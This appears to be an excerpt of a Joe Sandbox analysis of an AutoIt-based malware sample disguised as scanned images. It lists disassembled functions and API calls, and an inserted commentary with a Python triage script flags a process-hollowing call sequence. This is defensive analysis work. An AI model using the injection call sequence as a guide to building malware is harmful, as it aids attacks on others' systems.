                                                        control_flow_graph 1133 a4564d-a45666 1134 a45683 1133->1134 1135 a45668-a4566d 1133->1135 1136 a45685-a4568b 1134->1136 1135->1134 1137 a4566f-a45671 1135->1137 1138 a45673-a45678 call a48d68 1137->1138 1139 a4568c-a45691 1137->1139 1149 a4567e call a48ff6 1138->1149 1141 a45693-a4569d 1139->1141 1142 a4569f-a456a3 1139->1142 1141->1142 1144 a456c3-a456d2 1141->1144 1145 a456a5-a456b0 call a43020 1142->1145 1146 a456b3-a456b5 1142->1146 1147 a456d4-a456d7 1144->1147 1148 a456d9 1144->1148 1145->1146 1146->1138 1151 a456b7-a456c1 1146->1151 1152 a456de-a456e3 1147->1152 1148->1152 1149->1134 1151->1138 1151->1144 1155 a457cc-a457cf 1152->1155 1156 a456e9-a456f0 1152->1156 1155->1136 1157 a45731-a45733 1156->1157 1158 a456f2-a456fa 1156->1158 1160 a45735-a45737 1157->1160 1161 a4579d-a4579e call a50df7 1157->1161 1158->1157 1159 a456fc 1158->1159 1162 a45702-a45704 1159->1162 1163 a457fa 1159->1163 1164 a45739-a45741 1160->1164 1165 a4575b-a45766 1160->1165 1174 a457a3-a457a7 1161->1174 1169 a45706-a45708 1162->1169 1170 a4570b-a45710 1162->1170 1171 a457fe-a45807 1163->1171 1172 a45751-a45755 1164->1172 1173 a45743-a4574f 1164->1173 1167 a45768 1165->1167 1168 a4576a-a4576d 1165->1168 1167->1168 1177 a457d4-a457d8 1168->1177 1178 a4576f-a4577b call a44916 call a510ab 1168->1178 1169->1170 1170->1177 1179 a45716-a4572f call a50f18 1170->1179 1171->1136 1175 a45757-a45759 1172->1175 1173->1175 1174->1171 1176 a457a9-a457ae 1174->1176 1175->1168 1176->1177 1180 a457b0-a457c1 1176->1180 1181 a457ea-a457f5 call a48d68 1177->1181 1182 a457da-a457e7 call a43020 1177->1182 1194 a45780-a45785 1178->1194 1193 a45792-a4579b 1179->1193 1185 a457c4-a457c6 1180->1185 1181->1149 1182->1181 1185->1155 1185->1156 1193->1185 1195 a4580c-a45810 1194->1195 1196 a4578b-a4578e 1194->1196 1195->1171 1196->1163 1197 a45790 1196->1197 1197->1193
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                        • Instruction ID: 89d322aec19fb91975514609d0fb02c05be048490d4573b7f0f59bc5d4eb88f6
                                                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                        • Instruction Fuzzy Hash: 8451B539E00B05DFDB248FB9C98066EB7B1AFC0320F298B39F825962D2D7709D549B40
                                                        APIs
                                                          • Part of subcall function 00A24F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24F6F
                                                        • _free.LIBCMT ref: 00A5E68C
                                                        • _free.LIBCMT ref: 00A5E6D3
                                                          • Part of subcall function 00A26BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A26D0D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: d5a9da2470b5b25d1d328beefe82962d0ac8848539b3b7191601ace4ef8b4cf8
                                                        • Instruction ID: 9292102ff812418a5860b441858f9a5e1a7c4b102d4f1d272e0b05d08d623da2
                                                        • Opcode Fuzzy Hash: d5a9da2470b5b25d1d328beefe82962d0ac8848539b3b7191601ace4ef8b4cf8
                                                        • Instruction Fuzzy Hash: 15917F71910229AFCF08EFA8DD919EDB7B4FF19310F54446AF815AB291EB319A09CB50
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A235A1,SwapMouseButtons,00000004,?), ref: 00A235D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A235A1,SwapMouseButtons,00000004,?,?,?,?,00A22754), ref: 00A235F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00A235A1,SwapMouseButtons,00000004,?,?,?,?,00A22754), ref: 00A23617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 30fc3cd2f74dd6a93a895551dc61d85408374a720e39bab6707aa83757e75a23
                                                        • Instruction ID: da298d7b74f131a90ded2d97f1e1c40f86921b2193c67fbf2231e5fac738b677
                                                        • Opcode Fuzzy Hash: 30fc3cd2f74dd6a93a895551dc61d85408374a720e39bab6707aa83757e75a23
                                                        • Instruction Fuzzy Hash: AA114872610228BFDF20CFA8EC40AAFB7BCEF06740F018469E905D7210E3719E419B60
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: e15f4bf7b2d8a2436c426929ce02fd6b814221300437380313034c1dc15b3d9c
                                                        • Instruction ID: f96cba5f358305b223fb1c75e70bc80098df6b18ec09fc4dfa7eb4dbef280092
                                                        • Opcode Fuzzy Hash: e15f4bf7b2d8a2436c426929ce02fd6b814221300437380313034c1dc15b3d9c
                                                        • Instruction Fuzzy Hash: F662F930A14259DBEB24CBA4CC50BDEB776EF58300F1091A9D20DEB394E7799E81CB59
                                                        APIs
                                                          • Part of subcall function 00A25045: _fseek.LIBCMT ref: 00A2505D
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AAE
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AC1
                                                        • _free.LIBCMT ref: 00A8992C
                                                        • _free.LIBCMT ref: 00A89933
                                                        • _free.LIBCMT ref: 00A8999E
                                                          • Part of subcall function 00A42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A49C64), ref: 00A42FA9
                                                          • Part of subcall function 00A42F95: GetLastError.KERNEL32(00000000,?,00A49C64), ref: 00A42FBB
                                                        • _free.LIBCMT ref: 00A899A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                        • Instruction ID: eea75bd8c14b7c2a9817760c9631f1e35ce3af52ed2e7157939cdbeda68a69cb
                                                        • Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                        • Instruction Fuzzy Hash: 725149B1D04218AFDF249F64DC81AAEBBB9FF48310F1404AEF609A7241DB715A90CF58
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                        • Instruction ID: 1408e565c070fbe49a54b80d8421aa4493df993ea8beb112d97587afee6cbdcb
                                                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                        • Instruction Fuzzy Hash: 1141B379A407069BDF28CFA9C884BAF77A6EFC83A0B24817DE855C7681D770DD409B44
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A5EE62
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00A5EEAC
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                          • Part of subcall function 00A409D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A409F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: f4637d4d6d5a9b7ee27b7db515e818c6166537300930949d58e670deeadf521f
                                                        • Instruction ID: ef35769a32bbdb11a7c02b9067e94447e4ab5ad87f49d19602cd940b28db80f9
                                                        • Opcode Fuzzy Hash: f4637d4d6d5a9b7ee27b7db515e818c6166537300930949d58e670deeadf521f
                                                        • Instruction Fuzzy Hash: 6121C6719102589BCB05DF98D845BEE7BFCAF49300F00401AE909E7241DBB45A898F91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 372b4212d9b7141201a9b8812bca002ddbceb3962cf7f58cdd5f946e69b42141
                                                        • Instruction ID: b16a94981c95328a3b6826f118ecdb302da866c460ff35cd112ff71183bf033a
                                                        • Opcode Fuzzy Hash: 372b4212d9b7141201a9b8812bca002ddbceb3962cf7f58cdd5f946e69b42141
                                                        • Instruction Fuzzy Hash: 0A01F972C04218BEDB28C7A8C816EFE7BF8DB11301F00419AF552D2181E575A604D7A0
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00A89B82
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A89B99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 7a467a032be3f7ee3b34213adb39334b05f08561f409c2b6d43c50d932890a7d
                                                        • Instruction ID: 4a92febd5a6fb34a5b6283f6a92ab41afb6ded96b1cc4e5c00c76f9d5dd53858
                                                        • Opcode Fuzzy Hash: 7a467a032be3f7ee3b34213adb39334b05f08561f409c2b6d43c50d932890a7d
                                                        • Instruction Fuzzy Hash: 15D05E7954030EBFDB10DBD0DC0EFDA772CE704701F0046A1BE94911E1DEB455998B91
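Two entries in this listing are the ones a triager would pull out first: the function at 01690000, which calls CreateProcessW, Wow64GetThreadContext and ReadProcessMemory from a dump marked "based on PE: false" (code that is not backed by any mapped image), and the function at 00A89B82, which calls GetTempFileNameW with the prefix aut. The first three calls are the opening of a thread-context (process hollowing) injection sequence; the report's own signatures "Modifies the context of a thread in another process" and "Writes to foreign memory regions" confirm the remaining steps for this sample. The script below is an added example, not Joe Sandbox's code or the sample's: it parses entries in the bullet format used on this page and applies three rules that are the author's assumptions: (1) CreateProcessW plus a GetThreadContext/SetThreadContext variant plus ReadProcessMemory in one function is flagged as a hollowing pattern; (2) API calls attributed to a non-PE dump are flagged as unpacked or injected code; (3) a GetTempFileNameW prefix of aut is noted as consistent with the AutoIt runtime (the head of this report already classifies the binary as a compiled AutoIt script). The SAMPLE text is constructed from three of this page's entries with their hash and Associated lines dropped.

```python
"""Added example: triage rules over Joe Sandbox-style function entries.

Not Joe Sandbox code. The entry format (bullet, API.MODULE(args), ref: ADDR,
and the "Source File: ... based on PE: true/false" line) is taken from this
report; the three rules below are the author's assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three entries copied in shape from this report, with the
# per-entry "Associated" and hash lines dropped because the rules ignore them.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
Memory Dump Source
• Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00A89B82
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A89B99
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
APIs
• _memset.LIBCMT ref: 00A24401
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A244A6
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
"""

# One API bullet: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional (args), optional comma, then "ref: ADDR".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$"
)
# The dump line that closes every entry on the page.
SRC_RE = re.compile(
    r"^•\s*Source File:.*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$"
)

# APIs whose co-occurrence with CreateProcessW/ReadProcessMemory in one
# function marks a thread-context injection (rule 1).
CONTEXT_APIS = {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"}


@dataclass
class Entry:
    # (name, module, args, ref) per API bullet
    apis: List[Tuple[str, str, str, str]] = field(default_factory=list)
    offset: str = ""
    based_on_pe: Optional[bool] = None


def parse_entries(text: str) -> List[Entry]:
    """Group API bullets into entries; each entry ends at its Source File line."""
    entries, cur = [], Entry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            cur.apis.append((name, module, args or "", ref))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.offset = m.group(1)
            cur.based_on_pe = m.group(2) == "true"
            entries.append(cur)
            cur = Entry()
    return entries


def assess(entry: Entry) -> List[str]:
    """Apply the three assumed triage rules to one entry."""
    names = {api[0] for api in entry.apis}
    findings = []
    # Rule 1: spawn + thread context + cross-process memory access in one function.
    if {"CreateProcessW", "ReadProcessMemory"} <= names and names & CONTEXT_APIS:
        findings.append("process hollowing pattern: CreateProcessW + thread context + ReadProcessMemory")
    # Rule 2: the function lives in a dump that is not backed by a PE image.
    if entry.based_on_pe is False and entry.apis:
        findings.append("API calls from a non-image memory region (unpacked or injected code)")
    # Rule 3: 'aut' temp-file prefix (assumption: this prefix is the AutoIt runtime's).
    for name, _module, args, _ref in entry.apis:
        if name == "GetTempFileNameW" and "aut" in args.split(","):
            findings.append("GetTempFileNameW prefix 'aut' (consistent with the AutoIt runtime)")
    return findings


def scan(text: str) -> List[Tuple[str, List[str]]]:
    """Return (offset, findings) for every entry that triggers at least one rule."""
    return [(e.offset, assess(e)) for e in parse_entries(text) if assess(e)]


if __name__ == "__main__":
    for offset, findings in scan(SAMPLE):
        print(offset)
        for finding in findings:
            print("  -", finding)
```

Run against the full text of this report section, the script reports the 01690000 function twice (rules 1 and 2) and the 00A89B82 function once (rule 3); the CRT and tray-icon helpers stay silent. Rule 1 deliberately requires a context API alongside CreateProcessW and ReadProcessMemory, because a parent that only reads a child's memory is ordinary debugger or installer behaviour.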
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5a2cf3aa3738c302424164ce2cf53f22ca2010961a06872e7ac88ca4104b950
                                                        • Instruction ID: 3f26a0de77b94544d4e4834f11b9c4d4e940a67795c5ff93da1126b4379be568
                                                        • Opcode Fuzzy Hash: c5a2cf3aa3738c302424164ce2cf53f22ca2010961a06872e7ac88ca4104b950
                                                        • Instruction Fuzzy Hash: 11F15D71A083019FCB14DF28C585A6ABBE5FF88314F14892DF89A9B351D731E946CF82
                                                        APIs
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A403D3
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A403DB
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A403E6
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A403F1
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A403F9
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A40401
                                                          • Part of subcall function 00A36259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A2FA90), ref: 00A362B4
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A2FB2D
                                                        • OleInitialize.OLE32(00000000), ref: 00A2FBAA
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A649F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: 4c83287212a1eeda3b35a30a4358c6865ba2ccb6ebaace23d9c57f0e94551362
                                                        • Instruction ID: 82f9fe409926c945545a6ca9f46ede647276c28426a7af2782b045db99eda633
                                                        • Opcode Fuzzy Hash: 4c83287212a1eeda3b35a30a4358c6865ba2ccb6ebaace23d9c57f0e94551362
                                                        • Instruction Fuzzy Hash: 36819BB09012D18FC384EFAAEA956557BE4FBB83947108D3AE019CF2A2EB315406CF51
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A24401
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A244A6
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A244C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: e6150edc200c4d6de325a901ece60453daee3f9c0c8b21a4baae9e7cb40d603a
                                                        • Instruction ID: 265209aba12148052be7f7bb36d65a6571e28434ea637f2f2f51637aca52091c
                                                        • Opcode Fuzzy Hash: e6150edc200c4d6de325a901ece60453daee3f9c0c8b21a4baae9e7cb40d603a
                                                        • Instruction Fuzzy Hash: 003193719047518FD720EF68E884797BBF8FB59304F00093EF69A87241D7756944CB52
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4A3AB: __NMSG_WRITE.LIBCMT ref: 00A4A3D2
                                                          • Part of subcall function 00A4A3AB: __NMSG_WRITE.LIBCMT ref: 00A4A3DC
                                                        • __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4A408: GetModuleFileNameW.KERNEL32(00000000,00AE43BA,00000104,?,00000001,00000000), ref: 00A4A49A
                                                          • Part of subcall function 00A4A408: ___crtMessageBoxW.LIBCMT ref: 00A4A548
                                                          • Part of subcall function 00A432DF: ___crtCorExitProcess.LIBCMT ref: 00A432E5
                                                          • Part of subcall function 00A432DF: ExitProcess.KERNEL32 ref: 00A432EE
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
